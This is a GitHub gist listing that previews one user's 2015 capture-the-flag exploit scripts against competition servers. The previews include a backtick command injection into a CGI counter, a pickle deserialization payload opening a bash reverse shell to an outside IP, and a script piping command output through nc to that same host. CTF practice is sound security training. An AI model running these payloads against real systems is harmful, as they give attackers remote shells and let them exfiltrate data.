Peter Nguyen peternguyen93
peternguyen93
/ Whitehat_2015_web300.py
Created
October 28, 2015 03:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| cmd ='printf "%s|" /*' | |
| # cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3' | |
| for i in xrange(400): | |
| a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;') | |
| print chr(int(a.text.split(" ")[1].split("}")[0])), | |
| ''' | |
| for fd in xrange(100): |
peternguyen93
/ Whitehat_2015_web200.py
Created
October 28, 2015 02:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib, urllib2 | |
| import pickle | |
| url = 'http://lab13.grandprix.whitehatvn.com/b3acec105de421e136aad4024ee45b63.php?data=' | |
| shell = "cos\nsystem\n(S'bash -i >& /dev/tcp/128.199.171.28/8081 0>&1'\ntR." | |
| tmp = url + urllib.quote_plus(shell) | |
| req = urllib2.urlopen(tmp) |
peternguyen93
/ Whitehat_2015_web100.py
Created
October 28, 2015 02:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib, urllib2 | |
| import string | |
| import socket | |
| url = 'http://lab5b.grandprix.whitehatvn.com/cgi-bin/web13377331.py?input=0x1337' | |
| flag = '' | |
| regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX' | |
| i = 1 | |
| charset = string.letters + string.digits + '_' | |
| while 1: |
peternguyen93
/ Whitehat_2015_pwn500.py
Created
October 28, 2015 02:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| def exploit(): | |
| # raw_input('Debug>') | |
| while 1: |
peternguyen93
/ Whitehat_2015_pwn300.py
Created
October 28, 2015 02:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| from capstone import * | |
| p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337) | |
| def xor(msg): |
peternguyen93
/ Whitehat_2015_pwn200.py
Created
October 28, 2015 02:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author : peternguyen | |
| from Pwn import * | |
| import time | |
| # p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337) | |
| # p = Pwn(port=1337) | |
| def exploit(): | |
| cmd = 'cat flag.txt >&4;ls -lia >&4;' |
peternguyen93
/ matesctf.092015.re500.py
Created
October 2, 2015 08:10
— forked from yeuchimse/matesctf.092015.re500.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| __author__ = 'yeuchimse' | |
| import struct | |
| FileMode = ['rb', 'wb', 'ab', 'r+b', 'w+b', 'a+b'] | |
| Registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'esp', 'ebp'] | |
| # region ... | |
| def format_code(v): |
peternguyen93
/ matesctf_guess_round1.py
Created
September 27, 2015 05:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from Pwn import * | |
| import string | |
| p = Pwn(mode=1,host='lab04.matesctf.org',port=4003) | |
| def find_index_flag(): | |
| p.read_until('Remember: send us your hex-encoded flag.\r\n') | |
| last = 0xff # -2 |
peternguyen93
/ matesctf_easy_note_round1.py
Created
September 27, 2015 05:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from Pwn import * | |
| p = Pwn(mode=1,host='lab02.matesctf.org',port=4001) | |
| def add_node(nid,content): | |
| p.read_until('Please choose an option :') | |
| p.write('1\n') | |
| p.read_until('Please give me an id:') |
peternguyen93
/ rhinoxorus.py
Created
September 21, 2015 02:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from Pwn import * | |
| p = Pwn(host='54.152.37.20',port=24242) | |
| # p = Pwn(port=24242) | |
| def exploit(): | |
| shell = raw_input('> ') | |
| back_connect = shell + ' | nc 128.199.171.28 8001' |